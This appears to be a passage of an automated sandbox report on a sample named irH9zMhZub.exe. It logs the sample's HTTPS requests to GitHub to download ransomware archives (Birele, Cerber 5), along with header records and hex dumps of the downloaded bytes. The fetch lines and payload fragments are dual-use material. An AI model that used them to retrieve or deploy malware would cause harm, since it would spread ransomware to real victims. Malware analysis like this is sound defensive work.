                                                                                                                                                                                      2022-09-29 12:51:24 UTC2001INData Raw: c3 21 d7 a3 a4 eb 7d 5c 6c a2 73 5a e3 56 61 c0 7d f9 ec b5 47 e1 2f 4e a5 19 b8 c7 d7 b7 71 4e f4 5f 16 f2 fe 37 f5 48 e5 db c2 0b 1e 8d 2c 48 c7 86 d5 31 28 e1 06 14 0d 8e 03 f2 c1 dd 7d 98 da ab 72 83 6f c7 f7 fc a2 80 cb 10 a4 05 55 1b 2e e3 37 43 fe 3c 71 77 45 b7 b2 d2 00 6c 3d dc 70 c0 7e de f3 35 94 53 35 4a f4 3c 06 56 00 ec 63 98 4f f1 19 6d af 6a fc 4a c2 e6 da 17 57 61 59 dd ff ef 3a 84 dd fb 0a 8d e6 38 ff 50 aa 35 83 d3 ae d7 f1 fa ac 76 8f 7a ea dc 24 c1 60 b2 c8 f4 74 f5 0f f7 20 d0 3c 4f 15 dd 39 38 89 19 d8 72 ff f2 ae 22 e6 d7 a9 f7 7c a5 8e b7 a6 42 f8 fc 3c 9a d2 32 10 da 03 c6 fe e6 b4 79 d1 82 e8 c1 f4 b2 a7 d5 09 18 1e ec d8 12 30 9e a0 5c ae f2 cb c2 da 9d 33 02 70 1a e2 ab 06 93 3f 0d 0b fc 10 4f eb 1f ce a4 97 cb ad e0 d7 c5 e3
                                                                                                                                                                                      Data Ascii: !}\lsZVa}G/NqN_7H,H1(}roU.7C<qwEl=p~5S5J<VcOmjJWaY:8P5vz$`t <O98r"|B<2y0\3p?O
                                                                                                                                                                                      2022-09-29 12:51:24 UTC2017INData Raw: 8f 46 0e ac ff fd 63 09 bc 52 89 4d fc 4b 79 fa 84 ee d9 3f bc 00 1d bb c9 f6 a2 c4 53 66 59 67 22 23 31 86 94 0a cf 5b 4f 1f 50 1f d6 cf 91 13 0f 9a e6 cf 4c 0b 68 3f c6 83 75 55 bd ae 5a 74 9e 8f 03 3a 2f bd f2 e7 b7 7d 81 fa 1c 25 16 e4 f3 38 4b 65 2e d2 f8 90 5c 10 2c e4 27 b7 ae 93 d3 21 ae be ef c6 d2 8b 94 7a 01 c7 50 98 43 ef 0c c0 81 69 57 0e ff 45 09 28 7d c2 8a 04 7a 58 5b 19 04 d0 15 4c 86 7c 8f b9 bd 53 a5 ed 70 13 65 9c 87 40 03 8f 16 9f 18 7c 1d 43 16 ed f9 53 ce 9d 7e 31 a7 ae bc 07 2d e6 3a e0 94 30 a1 47 f8 dd fd a7 8c dc 74 c4 47 8c d2 1e fd 41 24 91 03 7f 92 98 0d 47 1e 89 ca 7b 14 0a c6 64 52 05 55 0d 13 d7 68 25 23 2c 29 e9 2e 26 77 94 8b 06 83 52 22 16 a9 8b bf 34 a7 4f d6 e0 eb fc 94 65 cf 3e c1 19 7b 68 b3 39 b5 84 ea 74 29 4b 81
                                                                                                                                                                                      Data Ascii: FcRMKy?SfYg"#1[OPLh?uUZt:/}%8Ke.\,'!zPCiWE(}zX[L|Spe@|CS~1-:0GtGA$G{dRUh%#,).&wR"4Oe>{h9t)K
                                                                                                                                                                                      2022-09-29 12:51:24 UTC2033INData Raw: 43 a5 9d 15 f3 2e ed f5 51 96 f5 73 7b c4 00 44 56 8a 93 e2 fb a6 4f 10 8b 14 e2 e8 54 79 d5 a8 b7 a4 96 f5 0a 04 44 f2 81 6a af 13 8b 9b 08 eb 45 62 3e 2f 6f 34 8f e0 e1 f7 e7 c8 f0 4f cc 19 39 16 c0 ff 19 37 e8 3a 17 cf 8f af d3 e7 02 4b 98 3b 81 ce 34 de 6e e3 4d f4 af 46 4c a2 a7 3b 5b 4a 79 17 51 53 5c 34 3f 15 7f 39 b1 b8 1b e5 63 a3 aa 94 6d 94 a4 fc b9 9d ce 3a 42 a2 9b 24 f8 ec 49 5e e1 1a 87 81 4f d1 62 b2 b8 d3 b2 4e 1f e5 c1 a0 fe 97 8b 38 dc 5a 8f fb c4 8a dd 98 bc d0 89 1c 1c da cd cf 1b d5 33 cd 00 63 b4 61 24 ae 84 47 af 95 86 10 06 19 c8 ef d5 3c df 9b 96 c0 fe 55 59 b1 f1 f2 04 d5 b1 2a 82 80 cf 75 43 d7 6a b3 de 06 46 72 0f 9b 5f 00 66 2b 3c 87 3c fd 63 55 50 37 1d 27 20 4b b9 57 8c cd 1b e2 5e 9a 08 d7 b8 d7 9c 65 49 61 d1 04 62 b7 5d
                                                                                                                                                                                      Data Ascii: C.Qs{DVOTyDjEb>/o4O97:K;4nMFL;[JyQS\4?9cm:B$I^ObN8Z3ca$G<UY*uCjFr_f+<<cUP7' KW^eIab]
                                                                                                                                                                                      2022-09-29 12:51:24 UTC2049INData Raw: 7f 17 28 44 8d 85 c6 15 cd dc 4e 87 4e 1a 27 d4 6b 30 ac b3 eb aa 2b d1 4c 78 d1 a9 8a f3 6a ca e8 86 07 c5 c0 1a 7a 64 cd cc ac b2 7c 82 d7 83 24 53 ab 27 69 60 dd 37 df 5a db 2f 6c 35 95 67 26 c3 2f 1c 33 63 5e 31 a5 58 86 b9 88 6b db 89 53 fd ee fe 7b 7b 28 2f 22 47 b6 72 24 ea 19 2b 85 82 ab 51 77 f2 1f 4b 01 b9 75 57 de 21 aa 73 92 ff d1 14 66 6d 97 8c 33 49 a3 86 85 67 06 1c 18 a3 65 57 ab a6 51 67 66 bb 26 55 4d a5 90 9a 89 11 66 bd 61 bc 4a eb 39 99 bf dd 3a f2 7b 35 b9 20 99 dc 68 54 a5 7c 0f df 4d be b4 07 03 8c 5e 94 5d 03 6c 5f e8 85 e1 a2 9b 27 36 77 55 4e d4 18 62 bc 23 db 63 5d 46 2b 15 92 ac 83 72 c4 4b b3 e4 ba a6 f5 68 8c 91 71 35 d8 8f a3 f3 87 14 d7 2f 3d 97 c0 8a 68 4a 75 50 73 d7 64 3f e8 7a 23 1a c2 13 af da 2e b0 16 d4 91 b1 53 9d
                                                                                                                                                                                      Data Ascii: (DNN'k0+Lxjzd|$S'i`7Z/l5g&/3c^1XkS{{(/"Gr$+QwKuW!sfm3IgeWQgf&UMfaJ9:{5 hT|M^]l_'6wUNb#c]F+rKhq5/=hJuPsd?z#.S
                                                                                                                                                                                      2022-09-29 12:51:24 UTC2065INData Raw: d1 cf f8 66 06 bb 43 98 f0 ea e4 06 f1 3a e9 d2 28 f1 e9 e1 9a c0 df bd 3d 79 cd b0 90 b0 53 69 33 cb 76 a9 b0 42 78 d1 8e c1 69 a4 7a 6e 2a 16 ac 87 dc 0a 4e 55 44 95 2d ac 63 f8 79 c5 a0 3b b4 74 cf b0 b9 ac cd 36 1d 58 a8 bf 8d 05 73 37 36 be bf 63 b4 e4 ee 4c b8 55 92 fc 35 cf 67 83 59 0e a2 8b 0e a6 6f e7 b8 88 71 0c a3 f4 db 8c 3a 84 d2 a7 d6 f2 35 fb cb 9e f8 8c 44 4b a0 ac c8 ac 14 97 53 1f ab c1 8e 01 0c af 10 77 54 b9 7e e2 05 84 8e 4c ed 5f 0f 75 bf 65 8f f2 65 98 c3 29 df 06 fc f6 89 e9 a5 9d cd d1 da 78 59 68 be 0f 3f 39 ea 22 e9 9a b2 ad 9f ca 91 c5 98 f3 b0 12 43 22 3e e8 ac 0a ba ca 08 4b cc f4 f0 d6 a5 a7 14 62 14 f3 22 41 e3 18 54 0a 0d 67 fd 36 61 72 04 31 a6 57 e4 8c 86 32 74 2b 35 ca 55 46 3b 4e 50 3c e0 2b cf 58 d0 0a 14 c4 72 9d f3
                                                                                                                                                                                      Data Ascii: fC:(=ySi3vBxizn*NUD-cy;t6Xs76cLU5gYoq:5DKSwT~L_uee)xYh?9"C">Kb"ATg6ar1W2t+5UF;NP<+Xr
                                                                                                                                                                                      2022-09-29 12:51:24 UTC2075INData Raw: 63 56 c2 e0 47 27 1f ec 8f 02 5c 11 2c d1 98 6c 85 93 7d d3 ba 94 f9 7f ee 87 47 b7 28 56 f8 6f fb 42 aa 3b 2a 5a 03 e3 69 b7 e0 e7 0c 00 78 13 be a9 a4 d4 9b 0b 2d d5 37 97 02 22 92 80 40 6b be 54 59 de ed 49 80 5c 29 d1 24 6c ee af 4d c3 a9 1c 4a 2d cb f3 fd 65 64 bd 1e c0 64 db 60 62 0b a2 9b 70 57 49 57 dc aa 57 74 d6 53 57 35 ef 0b dd 4b fc 4e 3a d7 99 c1 cb 30 d6 1c 19 5c ab e1 82 9c 81 5c d8 4f 22 58 1b 97 84 b7 af 57 3b 91 75 51 7c ca 23 0f 99 5a 0b 55 0c 35 77 f5 47 69 25 c5 fb de 63 1e 2b 27 a3 00 1d 78 48 b0 65 33 62 60 8f 9b f3 9b ce 6f ad 0c 7c 0b 31 f2 14 7f fb 49 1a 67 97 50 44 6f c7 e8 7a 01 a3 9e 27 52 f3 5d 53 40 dd f8 c2 bc 29 3e c4 09 e5 7e 5c 92 7d af 44 fd 25 b9 ab 01 8c 84 d1 30 36 f5 d9 37 ba 07 02 89 c6 f3 75 a0 1e f0 f9 32 12 35
                                                                                                                                                                                      Data Ascii: cVG'\,l}G(VoB;*Zix-7"@kTYI\)$lMJ-edd`bpWIWWtSW5KN:0\\O"XW;uQ|#ZU5wGi%c+'xHe3b`o|1IgPDoz'R]S@)>~\}D%067u25
                                                                                                                                                                                      2022-09-29 12:51:24 UTC2091INData Raw: 97 5a 34 60 65 be ce f3 9c 07 b5 0b aa 60 28 1b dd 1d 3d c9 1d 05 9c 8a 2c cb e8 a7 1a 45 68 08 01 b1 32 ce 60 fc be 23 4c 52 77 a4 3f 15 20 11 ee b4 c5 96 f6 10 e9 4a 85 fe 01 58 ac 1c c9 24 3d 8e 20 03 bc 2b 41 ee c2 8d 47 d7 1f af b5 6b 87 9a d5 9d 3a 6a 96 6b 36 d6 a6 10 a8 5d 11 2b 12 16 1b 8e 15 17 79 ea 3e 3a 08 4f c6 fd eb a7 0f 05 2f 2a 44 70 f3 b8 10 38 e2 72 67 de d7 49 4c 1f 2d f8 c9 15 56 3e bf 82 0d db b7 18 5a 1c 41 78 53 17 a0 0e 32 b8 16 05 01 9a 74 27 de 78 95 19 e7 51 40 25 e5 ee 63 b8 d9 d1 c0 cf 7f 54 e5 fc fa a4 4a ad 00 67 82 bd 87 17 42 4d 9f 1f c6 98 78 e5 56 0f d9 f0 cb a7 b1 6b 81 f4 84 28 57 2f bc 3c ef aa 20 96 b0 c5 0d c4 05 45 c4 5f 53 34 91 af f3 ff fb 2e 7a a3 34 ab 29 99 84 ac be ed 7f 95 94 4a 8c 61 f0 c5 c8 5d db 14 36
                                                                                                                                                                                      Data Ascii: Z4`e`(=,Eh2`#LRw? JX$= +AGk:jk6]+y>:O/*Dp8rgIL-V>ZAxS2t'xQ@%cTJgBMxVk(W/< E_S4.z4)Ja]6


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.6 | 49720 | 140.82.121.4 | 443 | C:\Users\user\Desktop\irH9zMhZub.exe

Timestamp | kBytes transferred | Direction | Data
2022-09-29 12:49:54 UTC | 396 | OUT | GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1
Host: github.com
2022-09-29 12:49:55 UTC | 396 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                      Server: GitHub.com
                                                                                                                                                                                      Date: Thu, 29 Sep 2022 12:49:55 GMT
                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                      Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                                                      Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Birele.zip
                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                      X-Frame-Options: deny
                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                      Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
2022-09-29 12:49:55 UTC | 397 | IN | Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.6 | 49721 | 185.199.108.133 | 443 | C:\Users\user\Desktop\irH9zMhZub.exe

Timestamp | kBytes transferred | Direction | Data
2022-09-29 12:49:55 UTC | 399 | OUT | GET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1
Host: raw.githubusercontent.com
2022-09-29 12:49:55 UTC | 399 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      Content-Length: 116134
                                                                                                                                                                                      Cache-Control: max-age=300
                                                                                                                                                                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                      Content-Type: application/zip
                                                                                                                                                                                      ETag: "591eaf40b2c1654824c7b57ace22a858e557d50f2bd61e6d218bc09b4c052c63"
                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                      X-Frame-Options: deny
                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                      X-GitHub-Request-Id: 33D4:39B3:7C75A4:8A0A06:6335930F
                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                      Date: Thu, 29 Sep 2022 12:49:55 GMT
                                                                                                                                                                                      Via: 1.1 varnish
                                                                                                                                                                                      X-Served-By: cache-mxp6961-MXP
                                                                                                                                                                                      X-Cache: HIT
                                                                                                                                                                                      X-Cache-Hits: 1
                                                                                                                                                                                      X-Timer: S1664455795.214913,VS0,VE311
                                                                                                                                                                                      Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                      X-Fastly-Request-ID: f7e9ab5b67d35b6de15e89d8fc6135460c77a4e8
                                                                                                                                                                                      Expires: Thu, 29 Sep 2022 12:54:55 GMT
                                                                                                                                                                                      Source-Age: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.6 | 49722 | 140.82.121.4 | 443 | C:\Users\user\Desktop\irH9zMhZub.exe
Timestamp | kBytes transferred | Direction | Data
2022-09-29 12:50:02 UTC | 513 | OUT | GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Cerber%205.zip HTTP/1.1
Host: github.com
2022-09-29 12:50:02 UTC | 513 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                      Server: GitHub.com
                                                                                                                                                                                      Date: Thu, 29 Sep 2022 12:48:28 GMT
                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                      Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                                                      Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip
                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                      X-Frame-Options: deny
                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                      Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
2022-09-29 12:50:02 UTC | 514 | IN | Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.6 | 49723 | 185.199.108.133 | 443 | C:\Users\user\Desktop\irH9zMhZub.exe
Timestamp | kBytes transferred | Direction | Data
2022-09-29 12:50:02 UTC | 515 | OUT | GET /Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip HTTP/1.1
Host: raw.githubusercontent.com
2022-09-29 12:50:02 UTC | 515 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      Content-Length: 185620
                                                                                                                                                                                      Cache-Control: max-age=300
                                                                                                                                                                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                      Content-Type: application/zip
                                                                                                                                                                                      ETag: "2a6ab7c5316fce8fcdfa21d92de6f495abe9a21496869efff37027ac0d4eb5d5"
                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                      X-Frame-Options: deny
                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                      X-GitHub-Request-Id: 9E7E:A32C:78ED2E:8681D5:6335928B
                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                      Date: Thu, 29 Sep 2022 12:50:02 GMT
                                                                                                                                                                                      Via: 1.1 varnish
                                                                                                                                                                                      X-Served-By: cache-mxp6965-MXP
                                                                                                                                                                                      X-Cache: HIT
                                                                                                                                                                                      X-Cache-Hits: 1
                                                                                                                                                                                      X-Timer: S1664455802.404701,VS0,VE1
                                                                                                                                                                                      Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                      X-Fastly-Request-ID: eb9be27824903db3c22c7f78be8619a86de746b9
                                                                                                                                                                                      Expires: Thu, 29 Sep 2022 12:55:02 GMT
                                                                                                                                                                                      Source-Age: 91
                                                                                                                                                                                      Data Ascii: |%hU|)I^OFT g0`5>h-To+n7h*La$0MSzk|UuhZ6z Ko~{qx^qaDxIWx7KIm0Yy;vC}I20"d2])?qD#
                                                                                                                                                                                      2022-09-29 12:50:02 UTC526INData Raw: 48 fc f7 dd 84 86 31 d7 41 75 61 f1 d6 42 07 f1 9a 00 14 2d 61 cd c8 f4 f0 d1 f2 f9 71 a0 0e 89 73 58 38 09 07 d0 ce 4f 59 31 78 0c 90 ad e8 f5 3d bd 8a 81 d5 bd f1 8b 87 f5 ce 73 e0 a2 89 e6 6b 84 8d c8 7a 36 92 2e 99 a9 c5 58 3b a2 c7 3f 22 4e 8a d5 4d 83 ae eb 15 af c3 52 c1 7d f9 9d 4c c1 f3 bd 1b b4 98 70 93 7c 5d d4 4b 63 3d 5f 65 ff df 79 85 cd 68 8d 1d 7d 3c 1a c8 32 a7 c9 82 41 86 1d 51 e2 7c 74 41 e9 83 3e 56 01 91 93 30 8a 23 5c 3d b9 d3 1a 5a 7c 32 7e b6 9e 48 29 05 08 60 1c 90 78 b2 06 f8 4e 88 94 86 16 7a 3a b9 9b 2b 12 90 c0 5d 6a 01 f9 45 16 87 7f 9e e5 19 51 9c 09 de 93 ed f0 9b 62 dd 74 41 bf fb 8e f1 fe 90 a6 93 db 2d 16 97 29 9a cd 82 10 46 b5 e7 3f 4c 3c 3d 65 66 af e0 d9 ff 14 52 8b 0b 2e 8c 39 da 67 bb 3a 0a d9 a1 8b 4c ea 36 64 4b
                                                                                                                                                                                      Data Ascii: H1AuaB-aqsX8OY1x=skz6.X;?"NMR}Lp|]Kc=_eyh}<2AQ|tA>V0#\=Z|2~H)`xNz:+]jEQbtA-)F?L<=efR.9g:L6dK
                                                                                                                                                                                      2022-09-29 12:50:02 UTC527INData Raw: f4 75 34 ba 52 b4 52 83 cc 26 fb eb af b2 47 ec ec c3 bf 8a 38 3e 24 97 83 ec ef 8d 3b a0 5e 6f af 3f dc 96 b5 b1 e8 16 1f 57 23 0d f6 3d d3 d5 16 d6 3c a4 20 7d c3 fa a1 95 e2 27 5c 70 07 8e f2 2f 4c a4 97 68 55 41 c6 07 8d 96 8c f2 41 dc 6c f3 70 ef 2d e9 f6 25 bf b1 8e e4 b0 3a 8a 95 6b 32 34 c4 37 92 c2 16 95 b8 54 7b 1b 25 a3 60 18 3e 4f 2d 54 f5 ef 43 0e d9 a9 e4 b6 86 4f d5 52 95 c3 9b f0 50 ac 98 f0 9f 99 27 70 a3 c3 87 33 4b 24 84 6b 1c 91 ae 37 f3 bd 14 3c f3 68 91 47 d3 4b cf 31 67 38 8e 39 43 a6 98 9f 40 37 c3 94 25 9a e8 04 32 f4 51 2a 9d ae 94 47 1d 7a ba 13 6a 05 bc ba 1f 44 92 15 7b 2f 1d 42 d8 43 1d 02 e0 cf f8 ca c9 58 fb be 98 a0 26 e2 4a bb aa f2 fe fb 14 90 af 6b 34 44 e4 1a 44 7c a6 1a f8 e8 e1 e1 56 41 eb a2 2f fc b9 7c c6 d7 08 5f
                                                                                                                                                                                      Data Ascii: u4RR&G8>$;^o?W#=< }'\p/LhUAAlp-%:k247T{%`>O-TCORP'p3K$k7<hGK1g89C@7%2Q*GzjD{/BCX&Jk4DD|VA/|_
                                                                                                                                                                                      2022-09-29 12:50:02 UTC528INData Raw: 68 a4 f5 2a 19 a9 5a f7 a0 49 b4 9b ae 6c 71 ed 85 c4 15 e9 8d 45 fc ce 67 19 a0 58 e4 4a c1 11 a6 c3 07 4d b4 8e 49 83 6d 6d 51 e0 4c c2 7f 26 58 9e 6e 08 ce f8 ce 18 71 5a db f3 da 00 9d c4 db 33 97 0e 75 d2 6c f6 d8 66 df 40 2a bf 6d 7c 61 14 6d 3b 35 00 8b 2c 3d f0 47 32 7a 5d ba 4a e0 62 42 71 c3 77 69 b3 fb cf 7d 21 fc 46 e6 50 e1 6f f0 ba 0c 91 a6 bd be aa e0 15 57 76 5c 6d 37 ba 8e b2 a7 52 6b dc 56 01 1f 73 ca 54 e2 dc b9 99 06 ce d5 f3 67 ba 68 d2 42 91 ad 24 09 d9 3a 33 43 f0 a8 e7 a9 5e 8d 7a 4b 4d 93 30 7b 23 9d 7d 64 97 62 b8 b0 2c 7f 7d 86 28 6e 1e 5c b8 be 88 75 13 b4 03 56 22 0a dd 50 7d a6 b8 10 b5 a3 8f 1c 6b 86 c3 19 54 30 4a a1 44 14 b0 fc ca c0 56 5e e5 5b 0d 60 d6 32 0a 23 c4 59 8b 45 53 0c 09 dc 3d 1c 50 08 3f e5 c7 4e a6 2b ae 44
                                                                                                                                                                                      Data Ascii: h*ZIlqEgXJMImmQL&XnqZ3ulf@*m|am;5,=G2z]JbBqwi}!FPoWv\m7RkVsTghB$:3C^zKM0{#}db,}(n\uV"P}kT0JDV^[`2#YES=P?N+D
                                                                                                                                                                                      2022-09-29 12:50:02 UTC530INData Raw: f0 b6 ff 5e 86 bd 6d 4b 60 ba ce ca eb 1c ab c1 ac 61 85 f7 06 87 04 c1 e5 77 2a c5 4b ad 39 6e d9 3a 53 98 43 8a a9 9c 4a 6d 0b 8f 54 17 57 99 7a cd 0e b2 85 e9 3e 21 33 7d 8c 02 8d a9 aa a4 b0 c6 f2 b3 36 84 bd eb 63 ec a5 ac 3a 2f 68 65 ed a0 8b c1 11 fd 5d 89 01 c4 e7 a8 b9 a4 bf 87 57 75 01 ce f1 eb 41 de 8e f2 99 75 6b 73 24 1d 42 d8 7b a8 e4 d2 39 ae 9e 99 13 3e 1e 18 f7 f2 f5 86 05 ee d1 d5 df 49 fe 3d fc 77 5b 93 64 09 75 66 ae 92 07 b0 19 2a a3 14 03 8c 05 af d0 ad d1 dc bb b8 22 a1 41 6a 1d 13 da 67 1e 0c 37 2a 93 71 1e 1a f7 fa 8d d4 73 b5 8f 34 a1 2b c3 fc d6 3f cb f6 80 0e 8b 75 20 c4 ff d3 b1 70 0d 4c 07 c1 9f 38 a1 75 56 ee 1f 1a 00 22 0f e4 b2 12 15 dd 63 12 24 d1 c3 35 9e 28 37 01 d5 22 2e 2c 01 eb b9 45 06 b1 0a 08 f4 93 84 a8 1f 5a ce
                                                                                                                                                                                      Data Ascii: ^mK`aw*K9n:SCJmTWz>!3}6c:/he]WuAuks$B{9>I=w[duf*"Ajg7*qs4+?u pL8uV"c$5(7".,EZ
                                                                                                                                                                                      2022-09-29 12:50:02 UTC531INData Raw: df 0b b4 96 3b 14 03 55 cd 0e 2b 6d d4 12 a9 22 63 a6 41 19 1b 00 19 d4 9b 88 9a 44 69 63 0d 98 45 59 fe 7c ec 0d e8 e4 1a 3a ca d1 34 d3 16 6e fe 00 f9 70 f0 2a 1b be c4 2e 74 ae d9 c8 49 cf 71 51 01 2c 74 23 c1 14 34 ff 0a b7 d2 9a 86 69 07 31 43 fb d6 d3 34 dd 85 3d 21 5a 06 b1 20 39 53 18 62 ba e1 8c 4a bf 9f 78 04 bc 9b 0d 9f 98 fd 73 d3 48 e8 f7 22 5e bc 19 2a 98 5f e3 c4 22 f4 d9 ed 7c df 51 8a 02 87 ed 49 b9 b6 ab eb 48 69 c6 4b d9 bf b3 51 91 84 6e 60 5b 07 e4 1e b9 3a 9e b6 8f 25 f3 70 11 65 0d 24 91 36 4d 26 d2 10 a1 db 11 cc 1f f6 3f a9 e5 99 a1 d5 26 35 f9 b5 ee 29 91 39 ef e3 fd 2f 3c ce 61 49 22 83 ef 6b 8d 79 90 16 25 56 cc 76 e8 37 01 e5 31 2b 07 c4 61 7e 67 9e 1e f5 08 7d 1b b8 b4 f7 70 b4 82 22 38 04 b8 c9 17 05 d5 b7 4c c7 4e 96 09 d0
                                                                                                                                                                                      Data Ascii: ;U+m"cADicEY|:4np*.tIqQ,t#4i1C4=!Z 9SbJxsH"^*_"|QIHiKQn`[:%pe$6M&?&5)9/<aI"ky%Vv71+a~g}p"8LN
                                                                                                                                                                                      2022-09-29 12:50:02 UTC531INData Raw: f7 25 70 99 e8 5f f8 48 e6 a8 16 17 99 dc b6 51 d8 6d 2b a5 a9 57 9a 79 db 40 75 74 cc 66 2d 8c 0a 06 f9 6f 7e dc 53 7d 94 32 43 43 e9 98 66 7e 44 8f 28 c1 59 0d dd 73 e8 b0 9a 25 f1 c3 7a 50 84 ab a6 b1 d4 19 46 60 32 76 3a 86 7d 48 17 4f 50 35 c7 9c b6 e6 72 e2 95 42 39 a8 79 94 eb 2c 02 6f 9f d5 0f 7e 54 c4 3c 33 7f 77 c3 97 99 de 1b 21 14 7f cb a6 d9 29 87 c6 5f 44 3a 17 70 bd fe e2 fc 3f ca 08 b9 c8 6a c5 b8 c7 bb 79 74 35 79 dd 5e eb 54 37 73 51 95 08 24 14 72 48 f9 aa f9 9e 07 87 a2 05 ac 17 73 33 7f 12 95 71 30 f7 c1 61 e1 0a ac 14 5a e3 d7 12 67 d3 8b af 49 bc 88 eb 97 c9 00 c0 e4 02 86 94 44 f2 10 5f 5a 59 a3 fa 58 65 1c 57 56 66 9b f4 09 94 46 22 3d 9c 19 fb 11 d6 6f 19 4b b4 28 be 06 e1 63 42 e7 da d2 da 34 9a 10 22 cb a5 31 6a c3 b3 b0 e1 e1
                                                                                                                                                                                      Data Ascii: %p_HQm+Wy@utf-o~S}2CCf~D(Ys%zPF`2v:}HOP5rB9y,o~T<3w!)_D:p?jyt5y^T7sQ$rHs3q0aZgID_ZYXeWVfF"=oK(cB4"1j
                                                                                                                                                                                      2022-09-29 12:50:02 UTC547INData Raw: 67 dc 14 31 58 19 f2 1f 0f 8e 06 22 d3 57 15 72 f4 42 06 d7 4f f1 83 13 69 64 06 a8 0d 76 7e 13 22 46 95 f3 d8 93 01 c5 4c 25 e2 d1 84 f5 fc 29 11 96 d8 ba 22 d2 48 7b 22 08 5f c2 1e fe 3a f1 46 ec 80 89 d8 77 97 31 08 f1 bd cb 38 30 b0 9f 91 23 b4 e8 af e3 69 8d 19 97 f5 f5 4a 99 f7 da 3b d2 4c 1b 96 6a d3 e1 5f 68 a5 00 e7 06 16 29 ae 20 d7 0e 8c 60 8f 9d 61 73 12 4b 3f cb a9 a4 3b c0 6f 2d 0a ee b2 3e 57 23 f4 39 59 16 66 65 80 69 97 3a 0a ca 0e 30 32 4d a4 93 6c f8 20 0d 77 a1 e9 a5 73 97 d2 f2 47 a5 b1 c3 c8 51 f5 35 d1 a4 9d 0c 66 45 26 24 ef 00 f8 8a 28 22 5b 61 a4 76 ae de 77 33 30 b9 e2 e0 eb dd 2b a7 76 51 bc f2 be c7 bc 41 46 b7 6d e1 bd c7 2e 23 cf c5 17 88 95 4b b2 58 c7 46 75 b2 b2 b2 92 c5 1d ca c4 01 34 c3 09 97 af c3 2c 74 f3 5d 26 81 bd
                                                                                                                                                                                      Data Ascii: g1X"WrBOidv~"FL%)"H{"_:Fw180#iJ;Lj_h) `asK?;o->W#9Yfei:02Ml wsGQ5fE&$("[avw30+vQAFm.#KXFu4,t]&
